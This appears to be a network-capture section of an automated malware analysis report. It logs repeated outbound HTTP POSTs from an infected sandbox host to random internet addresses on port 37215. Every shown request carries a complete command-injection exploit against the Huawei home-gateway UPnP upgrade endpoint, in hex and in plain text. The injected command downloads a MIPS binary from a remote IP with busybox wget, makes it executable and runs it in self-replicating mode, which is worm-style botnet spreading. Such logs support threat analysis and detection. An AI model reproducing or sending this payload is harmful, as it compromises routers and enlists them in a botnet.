                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        307192.168.2.2343426197.242.14.7237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.319878101 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        308192.168.2.233351241.214.199.5437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.319924116 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        309192.168.2.235945441.184.175.7137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.319925070 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        310192.168.2.2337294197.133.110.23837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.319925070 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        311192.168.2.233351041.57.103.10437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.319933891 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        312192.168.2.2345536197.116.87.2937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.320177078 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        313192.168.2.2339928157.207.30.15337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.322582960 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        314192.168.2.2333734197.224.252.16937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.322582960 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        315192.168.2.234163041.55.19.22737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.323014021 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        316192.168.2.2343240197.121.215.15837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.323034048 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
